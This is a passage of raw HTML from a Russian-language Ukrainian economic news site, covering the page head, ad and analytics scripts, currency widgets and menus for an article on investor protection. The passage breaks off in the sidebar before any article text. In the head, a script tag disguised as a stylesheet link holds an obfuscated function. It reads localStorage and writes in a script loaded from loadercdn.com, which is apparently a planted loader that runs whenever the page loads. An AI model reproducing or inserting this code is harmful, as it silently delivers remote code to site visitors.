<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Эксперт рассказал о мощной защите для инвесторов в Украине | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Эксперт рассказал о мощной защите для инвесторов в Украине "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/img/ielogo.jpg"/><meta property="og:type" content="website" /><meta property="og:image:width" content="200" /><meta property="og:image:height" content="200" /><meta property="og:type" content="article" /><meta property="og:image:alt" content="Экономические новости Украины и мира" /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='videojscss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/video-js.css' type='text/css' media='all' /><link rel='stylesheet' id='videojsimacss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Украине для привлечений инвестиций нужно начинать нужно со стратегии, с понимания ключевых целей, которые страна планирует достичь в следующие десять лет." /><meta property="og:description" content="Украине для привлечений инвестиций нужно начинать нужно со стратегии, с понимания ключевых целей, которые страна планирует достичь в следующие десять лет." /><meta name="keywords" content="анатолий амелин,инвестиции,суд,новости экономики" /><link rel="canonical" href="https://enovosty.com/news_economy/full/2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine" /><meta property="og:url" content="https://enovosty.com/news_economy/full/2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine" /><style>.ms-parent-id-5 > .master-slider{background:#000000}.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/news_economy/full/2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4809741';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4809741&amp;a=7115" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
data-inv="//ads.go2net.com.ua/"
data-r="single"
data-sender="go2net"
data-bundle="desktop"></script><meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script async src="//www.googletagservices.com/tag/js/gpt.js"></script><script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script><script>var div_1_sizes = [
[240, 320],[240, 350],[240, 420],[240, 500],[240, 600],[300, 250],[300, 280],[300, 300],[300, 400],[300, 500],[300, 600],[320, 50],[320, 100],[320, 250],[320, 480],[320, 600]
];var div_2_sizes = [
[200, 200],[200, 400],[200, 600],[240, 350],[240, 500],[240, 600],[300, 250],[300, 300],[300, 400],[300, 500],[300, 600]
];var div_3_sizes = [
[240, 350],[240, 500],[300, 250],[300, 600]
];var div_4_sizes = [
[300, 250],[300, 50],[300, 75],[300, 100],[300, 300],[320, 50],[320, 100],[320, 250],[320, 200]
];var PREBID_TIMEOUT = 1000;var FAILSAFE_TIMEOUT = 3000;var adUnits = [
{code: '/29636627/enovosty.com_300x600_mob_hb',mediaTypes: {banner: {sizes: div_1_sizes
}},bids: [{bidder: 'admixer',params: {zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
}}]
},{code: '/29636627/enovosty.com_320x250_hb',mediaTypes: {banner: {sizes: div_4_sizes
}},bids: [{bidder: 'admixer',params: {zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
}}]
},{code: '/29636627/enovosty.com_300x600_top_hb',mediaTypes: {banner: {sizes: div_2_sizes
}},bids: [{bidder: 'admixer',params: {zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
}}]
},{code: '/29636627/enovosty.com_300x600_ukr.net_hb',mediaTypes: {banner: {sizes: div_3_sizes
}},bids: [{bidder: 'admixer',params: {zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
}}]
}];// ======== DO NOT EDIT BELOW THIS LINE =========== //
var googletag = googletag || {};googletag.cmd = googletag.cmd || [];googletag.cmd.push(function() {googletag.pubads().disableInitialLoad();});var pbjs = pbjs || {};pbjs.que = pbjs.que || [];pbjs.que.push(function() {pbjs.addAdUnits(adUnits);pbjs.requestBids({bidsBackHandler: initAdserver,timeout: PREBID_TIMEOUT
});});function initAdserver() {if (pbjs.initAdserverSet) return;pbjs.initAdserverSet = true;googletag.cmd.push(function() {pbjs.que.push(function() {pbjs.setTargetingForGPTAsync();googletag.pubads().refresh();});});}// in case PBJS doesn't load
setTimeout(function() {initAdserver();}, FAILSAFE_TIMEOUT);googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});</script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});
</script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});globalAml.singleRequest("go2net");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_economy/full/2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_economy/full/2406-ekspert-rasskazal-o-moshhnoj-zashhite-dlya-investorov-v-ukraine?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" /></a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>26.79</td><td>26.45</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>30.30</td><td>29.57</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.40</td><td>0.30</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>499.46</td><td>0.00</td><td>13:05 23.06.2020</td> </tr> <tr class="tr_white"> <td>UX</td><td>1363.13</td><td>0.42</td><td>13:15 24.06.2020</td> </tr> <tr> <td>RTS</td><td>1281.18</td><td>0.00</td><td>18:51 23.06.2020</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>42.21</td><td>-0.99</td><td style="text-transform:uppercase;">Jun</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>39.83</td><td>-1.34</td><td style="text-transform:uppercase;">Jun</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>363.00</td><td>-2.35</td><td style="text-transform:uppercase;">Jun</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
Афиша</a><a class="archive" href="https://enovosty.com/archive">Архив</a><div style="clear: both;vertical-align:top;"> <a href="https://enovosty.com" title="Последние новости - &quot;ЭКОНОМИЧЕСКИЕ НОВОСТИ&quot;" onclick="window.external.AddFavorite(this.href, this.title); return false;" rel="sidebar">Добавить в закладки</a> </div> </div> <div class="cls"></div></div> <div id="mainMenu" data-hover="hover-on-menu"><ul id="ull" class="menu"><li class="menu-item-has-children"><a class="first" href="https://enovosty.com/news" data-hover="hover-on-link">Новости</a><ul class="sub-menu"><li><a href="https://enovosty.com/news_politics">Политика</a></li><li><a href="https://enovosty.com/news_kiev">Киев</a></li><li class="current-menu-item"><a href="https://enovosty.com/news_economy">Экономика</a></li><li><a href="https://enovosty.com/news-finance">Финансы</a></li><li><a href="https://enovosty.com/news_ekskluzive">Эксклюзив</a></li><li><a href="https://enovosty.com/news-markets">Рынки</a></li><li><a href="https://enovosty.com/news_society">Общество</a></li><li><a href="https://enovosty.com/news_abroad">Мир</a></li><li><a href="https://enovosty.com/news_sport">Cпорт</a></li><li><a href="https://enovosty.com/news-culture">Культура</a></li><li><a href="https://enovosty.com/news-auto">Авто</a></li><li><a href="https://enovosty.com/news_incidents">Происшествия</a></li><li><a href="https://enovosty.com/news_technology">Наука и технологии</a></li><li><a href="https://enovosty.com/zdorove">Здоровье</a></li></ul></li><li><a href="https://enovosty.com/politika">Политика</a></li><li><a href="https://enovosty.com/ekonomika">Экономика</a></li><li><a href="https://enovosty.com/finance">Финансы</a></li><li><a href="https://enovosty.com/markets">Рынки</a></li><li><a href="https://enovosty.com/society">Общество</a></li><li><a href="https://enovosty.com/tehnologii">Технологии</a></li><li><a href="https://enovosty.com/auto">Авто</a></li><li ><a href="https://enovosty.com/blogs">Мнения</a></li><li ><a href="https://enovosty.com/person">Досье</a></li><li id="menu-item-4513425_old" ><a href="https://enovosty.com/currency-rates">Курсы валют</a></li><li id="menu-item-4513319" class="menu-item-has-children" style="border-right: 1px solid #fff;"><a href="#">Ещё...</a><ul class="sub-menu"><li><a href="https://enovosty.com/o-proekte">О проекте</a></li><li><a href="https://enovosty.com/author">Авторы</a></li><li><a href="https://enovosty.com/photo-nedeli">Фото недели</a></li><li><a href="https://enovosty.com/presidenty-2019">Кандидаты в президенты 2019</a></li><li><a href="https://enovosty.com/vybory-2019" >Выборы 2019</a></li></ul></li><li id="menu-item-4513417" ><a href="https://enovosty.com/specproekty/rynok-zemli">Рынок земли</a></li><li id="menu-item-4513417" ><a href="https://enovosty.com/tag/COVID-19">COVID-19</a></li></ul></div><script>jQuery(document).ready(function($){if(jQuery( window ).width() < 606){var touchHover = function() {$('.first').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});$('.finance').click(function(e){e.preventDefault();var $this = $(this);var onHover = $this.attr('data-hover');var linkHref = $this.attr('href');if (linkHref && $this.hasClass(onHover)) {location.href = linkHref;return false;}$this.toggleClass(onHover);});};$(document).ready(function() { touchHover(); });}});</script> </div>  <div id="body"><div class="cls"></div><div id="sidebarLeft_n" style="width:210px;"><script>jQuery(document).ready(function($){$('#slider').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><div class="topnews_single slide"><p style="padding: 0 7px;
font-weight: 700;
font-family: arial,verdana,tahoma;
background: url(/wp-content/themes/eizvestia/img/blueline.jpg) repeat-x;
line-height: 9px;
margin: 2px 0 9px;
text-align: center;"><a href="https://enovosty.com/top-news"><span style="background-color: #fff;
font-size: 12px;
color: #326698;
text-transform: uppercase;
padding: 0 9px;">Топ-новости &nbsp;&nbsp;<i style="font-size: 11px;color: #666;font-style: normal;text-transform: none;">за 24 часа</i></span></a></p><ul id="slider"><li><ul class="tact"><li id="li0" style="width:210px;"><a href="https://enovosty.com/news_politics/full/2406-nato-gotovitsya-asimmetrichno-otvetit-na-agressiiyu-rf" title="НАТО готовится асимметрично ответить на агрессиию РФ"><img width="210" height="156" alt="НАТО готовится асимметрично ответить на агрессиию РФ" src="https://enovosty.com/wp-content/uploads/2020/06/mircea-geoana-nato-foto-facebook-mirceageoana.png"></a><a href="https://enovosty.com/news_politics/full/2406-nato-gotovitsya-asimmetrichno-otvetit-na-agressiiyu-rf" title="НАТО готовится асимметрично ответить на агрессиию РФ" class="name">НАТО готовится асимметрично ответить на агрессиию РФ <span>(1368)</span></a></li></ul></li><li><ul class="tact"><li id="li1" style="width:210px;"><a href="https://enovosty.com/news-auto/full/2406-ukrainskij-avtorynok-mogut-zapolnit-deshevye-dizelnye-avtomobili-iz-germanii" title="Украинский авторынок могут заполнить дешевые дизельные автомобили из Германии"><img width="210" height="156" alt="Украинский авторынок могут заполнить дешевые дизельные автомобили из Германии" src="https://enovosty.com/wp-content/uploads/2020/06/2804795-e1592982529494.jpg"></a><a href="https://enovosty.com/news-auto/full/2406-ukrainskij-avtorynok-mogut-zapolnit-deshevye-dizelnye-avtomobili-iz-germanii" title="Украинский авторынок могут 